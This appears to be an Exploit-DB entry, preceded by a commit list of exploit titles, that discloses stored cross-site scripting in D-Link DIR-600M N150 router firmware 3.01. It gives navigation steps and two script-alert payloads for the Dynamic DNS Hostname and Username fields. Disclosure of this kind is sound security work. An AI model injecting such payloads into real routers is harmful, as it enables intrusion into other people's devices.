8379495e8e
10 changes to exploits/shellcodes Cisco Umbrella Roaming Client 2.0.168 - Privilege Escalation FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure) Tenda ADSL Router D152 - Cross-Site Scripting Jorani Leave Management 0.6.5 - Cross-Site Scripting Jorani Leave Management 0.6.5 - 'startdate' SQL Injection Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure) WirelessHART Fieldgate SWG70 3.0 - Directory Traversal Online Quiz Maker 1.0 - 'catid' SQL Injection Logicspice FAQ Script 2.9.7 - Remote Code Execution PHP File Browser Script 1 - Directory Traversal Online Quiz Maker 1.0 - 'catid' SQL Injection D-Link Dir-600M N150 - Cross-Site Scripting Logicspice FAQ Script 2.9.7 - Remote Code Execution PHP File Browser Script 1 - Directory Traversal
17 lines
No EOL
599 B
Text
17 lines
No EOL
599 B
Text
# Exploit Title: D-Link Dir-600M N150 - Cross-Site Scripting
|
|
# Date: 2018-09-06
|
|
# Exploit Author: PUNIT DARJI
|
|
# Vendor Homepage: www.dlink.co.in
|
|
# Hardware Link: https://amzn.to/2NUIniO
|
|
# Version: DIR-600M Firmware 3.01
|
|
# Tested on: Windows 7 ultimate
|
|
# CVE: N/A
|
|
|
|
#POC
|
|
|
|
Goto your Wifi Router Gateway [i.e: 192.168.X.X ip address of router]
|
|
Go to --> "Advance" --> "Dynamic DNS" --> "Hostname"
|
|
<script>alert("PSYCHO55")</script>
|
|
"Username" --> <script>alert("PunitDarji")</script>
|
|
and hit apply Refresh the page, and you will get the 2 pop-up first
|
|
"PSYCHO55" and second "PunitDarji". |